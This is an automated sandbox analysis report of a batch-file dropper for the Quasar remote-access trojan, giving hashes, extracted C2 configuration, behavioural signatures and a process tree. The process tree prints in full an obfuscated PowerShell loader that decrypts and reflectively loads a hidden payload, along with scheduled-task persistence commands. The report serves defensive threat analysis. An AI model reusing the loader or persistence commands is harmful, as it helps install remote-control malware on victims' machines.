Analysis

Max time kernel: 28s
Max time network: 17s
Platform: windows10-1703_x64
Resource: win10-20240404-en
Resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
Submitted: 17-04-2024 00:30
Static task: static1
General

Target: jstr-built.bat
Size: 1.8MB
MD5: 6152646d22fa2dfddf47c46a854a04bb
SHA1: b0741da3d0cb9d00bc583e5acc11db419fd1de61
SHA256: f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5
SHA512: 9542dc77487b0abf82bbeff4fd09c35958344855c7825a4b2ce2ee6bd887eb584b7e1c6ea900b1210b130dd70184d5ca66f7a2de7e9e90ef85c403261841840c
SSDEEP: 49152:lb7smSSlM/MByDVR/aFPxB0snxHsgfM+DLHeD:2
Malware Config

Extracted family: quasar
Version: 1.4.1
Slave
127.0.0.1:80
0.tcp.ngrok.io:19607
569bd8bb-286e-475a-a912-45ea94f9c8b7
encryption_key: 1AF7C677BDE3B8255A8F16FC1CA9D8C708B5355F
install_name: system32 QC.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Update
subdirectory: Windows QC
Signatures

Quasar payload (1 IoC)
  Resource: behavioral1/memory/1780-120-0x0000018B71CE0000-0x0000018B72004000-memory.dmp
  YARA rule: family_quasar

Executes dropped EXE (1 IoC)
  PID 3956: system32 QC.exe

Drops file in System32 directory (3 IoCs)
  File created: C:\Windows\system32\Windows QC\system32 QC.exe (powershell.exe)
  File opened for modification: C:\Windows\system32\Windows QC\system32 QC.exe (powershell.exe)
  File opened for modification: C:\Windows\system32\Windows QC (powershell.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings (powershell.exe)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (12 IoCs)
  PID 1920 powershell.exe (3 events)
  PID 216 powershell.exe (3 events)
  PID 1780 powershell.exe (3 events)
  PID 3956 system32 QC.exe (3 events)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  PID 1920 powershell.exe: SeDebugPrivilege
  PID 216 powershell.exe: SeDebugPrivilege, then the following set adjusted three times in sequence (the recorded list is cut off during the third pass): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory (22 IoCs; each parent-to-child write is recorded twice)
  PID 4196 cmd.exe -> PID 344 net.exe
  PID 344 net.exe -> PID 212 net1.exe
  PID 4196 cmd.exe -> PID 1920 powershell.exe
  PID 1920 powershell.exe -> PID 216 powershell.exe
  PID 1920 powershell.exe -> PID 5016 WScript.exe
  PID 5016 WScript.exe -> PID 2756 cmd.exe
  PID 2756 cmd.exe -> PID 1900 net.exe
  PID 1900 net.exe -> PID 4944 net1.exe
  PID 2756 cmd.exe -> PID 1780 powershell.exe
  PID 1780 powershell.exe -> PID 1960 schtasks.exe
  PID 1780 powershell.exe -> PID 3956 system32 QC.exe

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indentation shows parent/child depth)

C:\Windows\system32\cmd.exe
  Command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\jstr-built.bat"
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    Command: net file
    Signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 file

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVUJVzJeFce7f5XhgQpfXWd8gtkJokjuZazm1CcEb0E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2pnv0SMUS2wyUdXSxBRIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LgLaU=New-Object System.IO.MemoryStream(,$param_var); $BFpyT=New-Object System.IO.MemoryStream; $WHHER=New-Object System.IO.Compression.GZipStream($LgLaU, [IO.Compression.CompressionMode]::Decompress); $WHHER.CopyTo($BFpyT); $WHHER.Dispose(); $LgLaU.Dispose(); $BFpyT.Dispose(); $BFpyT.ToArray();}function execute_function($param_var,$param2_var){ $WpAgz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iQVMR=$WpAgz.EntryPoint; $iQVMR.Invoke($null, $param2_var);}$Aneil = 'C:\Users\Admin\AppData\Local\Temp\jstr-built.bat';$host.UI.RawUI.WindowTitle = $Aneil;$ltaKo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Aneil).Split([Environment]::NewLine);foreach ($iIzJm in $ltaKo) { if ($iIzJm.StartsWith(':: ')) { $egjDd=$iIzJm.Substring(3); break; }}$payloads_var=[string[]]$egjDd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_107_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_107.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WScript.exe
      Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_107.vbs"
      Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        Command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_107.bat" "
        Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\net.exe
          Command: net file
          Signatures: Suspicious use of WriteProcessMemory

          C:\Windows\system32\net1.exe
            Command: C:\Windows\system32\net1 file

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVUJVzJeFce7f5XhgQpfXWd8gtkJokjuZazm1CcEb0E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2pnv0SMUS2wyUdXSxBRIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LgLaU=New-Object System.IO.MemoryStream(,$param_var); $BFpyT=New-Object System.IO.MemoryStream; $WHHER=New-Object System.IO.Compression.GZipStream($LgLaU, [IO.Compression.CompressionMode]::Decompress); $WHHER.CopyTo($BFpyT); $WHHER.Dispose(); $LgLaU.Dispose(); $BFpyT.Dispose(); $BFpyT.ToArray();}function execute_function($param_var,$param2_var){ $WpAgz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iQVMR=$WpAgz.EntryPoint; $iQVMR.Invoke($null, $param2_var);}$Aneil = 'C:\Users\Admin\AppData\Roaming\startup_str_107.bat';$host.UI.RawUI.WindowTitle = $Aneil;$ltaKo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Aneil).Split([Environment]::NewLine);foreach ($iIzJm in $ltaKo) { if ($iIzJm.StartsWith(':: ')) { $egjDd=$iIzJm.Substring(3); break; }}$payloads_var=[string[]]$egjDd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

          C:\Windows\SYSTEM32\schtasks.exe
            Command: "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\system32\Windows QC\system32 QC.exe" /rl HIGHEST /f
            Signatures: Creates scheduled task(s)

          C:\Windows\system32\Windows QC\system32 QC.exe
            Command: "C:\Windows\system32\Windows QC\system32 QC.exe"
            Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: ad5cd538ca58cb28ede39c108acb5785
  SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 7c063219527a7709eacae3b97197e0ff
  SHA1: aec6bb765534427b6564f486fb62651076a36f80
  SHA256: 96dfc43d1b2be59f2ba61ec20ca12f9c17f57fe6c4e919883a10387f1065d571
  SHA512: 35580b9f2ee14c2f08762c3f1bf41ceafe1bb20498cc0b8fe74e9f7d6ff81e17f252810764d0ac85f4647b3995c5d5b93351c98bad4921e60c90877c7ea6bb8f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kb3seeto.pvi.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Roaming\startup_str_107.bat
  Filesize: 1.8MB
  MD5: 6152646d22fa2dfddf47c46a854a04bb
  SHA1: b0741da3d0cb9d00bc583e5acc11db419fd1de61
  SHA256: f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5
  SHA512: 9542dc77487b0abf82bbeff4fd09c35958344855c7825a4b2ce2ee6bd887eb584b7e1c6ea900b1210b130dd70184d5ca66f7a2de7e9e90ef85c403261841840c

C:\Users\Admin\AppData\Roaming\startup_str_107.vbs
  Filesize: 115B
  MD5: 4851185e2828ac223a0da8f32527c000
  SHA1: 72f4de01db8b447b4541b21b51f48875fa4112f6
  SHA256: 17ff718e490d784eca93233f4586e6ab60046fd767533b36c34e49de75be9d3a
  SHA512: ba7e2f797f30715185b0d1fdc6c3a97b3fca415a679a4188c186ae03c43196852bd6d8f619b8b1223e52196539ca979bf27ca574969a2dfe51bdd32cf3d3782a

C:\Windows\System32\Windows QC\system32 QC.exe
  Filesize: 435KB
  MD5: f7722b62b4014e0c50adfa9d60cafa1c
  SHA1: f31c17e0453f27be85730e316840f11522ddec3e
  SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
  SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4